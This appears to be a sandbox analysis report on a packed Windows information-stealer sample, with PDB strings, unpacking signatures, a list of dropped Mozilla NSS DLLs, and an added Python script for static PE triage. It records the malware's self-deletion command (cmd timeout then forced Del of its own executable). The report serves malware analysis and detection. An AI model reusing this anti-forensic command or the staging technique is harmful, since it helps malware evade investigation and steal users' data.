Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004000BB push edx; retf 1_2_004000C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004407F0 push ecx; ret 1_2_00440803
PE file contains sections with non-standard names
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /31
Source: sqlite3.dll.1.dr Static PE information: section name: /45
Source: sqlite3.dll.1.dr Static PE information: section name: /57
Source: sqlite3.dll.1.dr Static PE information: section name: /70
Source: sqlite3.dll.1.dr Static PE information: section name: /81
Source: sqlite3.dll.1.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr Static PE information: section name: .orpc
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Binary contains a suspicious time stamp
Source: ucrtbase.dll.1.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.9745561755
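The four signatures in this section are static checks on the section table, the debug-directory strings and the COFF header, and they need reading with care. The push edx; retf at 1_2_004000BB sits in the header page of the image (base 0x400000, offset 0xBB is inside the DOS stub), so it is header bytes disassembled as code, not a real gadget. The non-standard section names all come from the dropped Mozilla and runtime DLLs, not from the stealer: .orpc is the section MIDL-generated proxy/stub DLLs use, .didat holds MSVC delay-load import data, .rodata is a read-only data section from a non-MSVC toolchain, and "/4", "/19", ... are GCC/MinGW long section names stored as decimal offsets into the COFF string table. The 2054 timestamp is on ucrtbase.dll, whose TimeDateStamp is a reproducible-build hash rather than a time, as on other recent Microsoft binaries. The findings that do matter for the stealer itself are the 7.97-bit .text entropy together with the in-place overwrite of its own PE header: a packed stub that unpacks over itself. The trailing characters on several PDB strings earlier (pdbGCTL, pdb22!, pdbUU) are bytes the string dumper picked up after the path in the debug record.

The script below is an added example, not Joe Sandbox code, that reproduces these checks over a constructed PE32 image. build_pe() assembles the image in memory, sample_image() is a stand-in for the sample rather than the sample, and ANALYSIS_TIME, STANDARD_SECTIONS and the PDB regex are this example's own assumptions.

```python
"""Static PE triage of the kind the sandbox signatures above perform.

Added example, not Joe Sandbox code. The image it runs on is constructed
in memory by build_pe(); it is a stand-in for the sample, not the sample.
"""
import math
import re
import struct
from datetime import datetime, timedelta, timezone

# IMAGE_SCN_* characteristics bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a stock MSVC-linked image uses (assumed list). Anything else is
# reported; .orpc, .didat, .rodata and "/N" are legitimate, see lead-in.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc",
                     ".idata", ".edata", ".pdata", ".tls", ".bss", ".CRT"}
# Stop at ".pdb": the bytes after it belong to the next debug record.
PDB_PATH_RE = re.compile(rb"[A-Za-z]:\\[^\x00]{1,240}?\.pdb")
ANALYSIS_TIME = datetime(2021, 10, 1, tzinfo=timezone.utc)  # assumed run date

def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0..8.0; close to 8 means packed or encrypted."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def rights(characteristics: int) -> str:
    """Rights in the report's notation, e.g. 'ER' for a normal .text."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"),
             (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)

def coff_timestamp_to_utc(ts: int) -> datetime:
    # timedelta arithmetic sidesteps platform limits of fromtimestamp().
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)

def parse_pe(image: bytes) -> dict:
    """Walk DOS header -> COFF header -> section table of a PE32 image."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table, sections = coff + 20 + opt_size, []
    for i in range(nsec):
        (name, _, _, raw_size, raw_ptr, _, _, _, _,
         chars) = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "rights": rights(chars),
                         "entropy": round(shannon_entropy(raw), 4)})
    return {"machine": machine, "timestamp": timestamp, "sections": sections}

def section_layout(image: bytes) -> str:
    """'.text:ER;.rdata:R;...', the string the unpacking signature compares."""
    return "".join(f"{s['name']}:{s['rights']};" for s in parse_pe(image)["sections"])

def extract_pdb_paths(image: bytes) -> list:
    return sorted({m.decode("latin-1") for m in PDB_PATH_RE.findall(image)})

def triage(image: bytes, now: datetime) -> list:
    """Findings that mirror the sandbox signatures in this section."""
    pe, findings = parse_pe(image), []
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']}")
        if "E" in s["rights"] and "W" in s["rights"]:
            findings.append(f"writable and executable section: {s['name']}")
        if "E" in s["rights"] and s["entropy"] > 7.0:
            findings.append(f"high-entropy code section: {s['name']} ({s['entropy']})")
    link_time = coff_timestamp_to_utc(pe["timestamp"])
    if pe["timestamp"] == 0 or link_time > now:
        findings.append(f"suspicious timestamp: {link_time:%Y-%m-%d %H:%M:%S} UTC")
    return findings

def build_pe(sections: list, timestamp: int) -> bytes:
    """Constructed minimal PE32 from (name, characteristics, data) triples.
    Just enough header for a section walk; not a loadable image."""
    align, opt_size = 0x200, 0xE0
    first_raw = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // align) * align
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")  # PE32 magic only
    table, blobs, raw_ptr, va = b"", b"", first_raw, 0x1000
    for name, chars, data in sections:
        raw_size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        raw_ptr, va = raw_ptr + raw_size, va + -(-raw_size // 0x1000) * 0x1000
    return (dos + b"PE\0\0" + coff + optional + table).ljust(first_raw, b"\0") + blobs

def sample_image() -> bytes:
    """Constructed stand-in: a flat-histogram .text (exactly 8.0 bits), an
    RSDS record (sig + GUID + age = 24 bytes) whose path is followed by
    junk, and a MinGW-style '/4' section; timestamp is the ucrtbase value."""
    rsds = b"RSDS" + b"\0" * 20 + b"C:\\boguxuram_wizuz\\hakekuna.pdbGCTL\0"
    return build_pe([
        (".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 16),
        (".rdata", IMAGE_SCN_MEM_READ, rsds),
        (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\0" * 64),
        ("/4", IMAGE_SCN_MEM_READ, b"\0" * 16),
    ], timestamp=0x9E3394C7)

if __name__ == "__main__":
    img = sample_image()
    print(section_layout(img), extract_pdb_paths(img))
    for line in triage(img, ANALYSIS_TIME):
        print(line)
```

On the real sample you would run triage() over the file on disk and section_layout() over both the file and the memory dump; a differing layout string (here .rsrc on disk against .reloc in the dump) is exactly what the "changes PE section rights" signature reports, because the dumped image is the unpacked payload, not the stub.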

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Extensive use of GetProcAddress (often used to hide API calls)
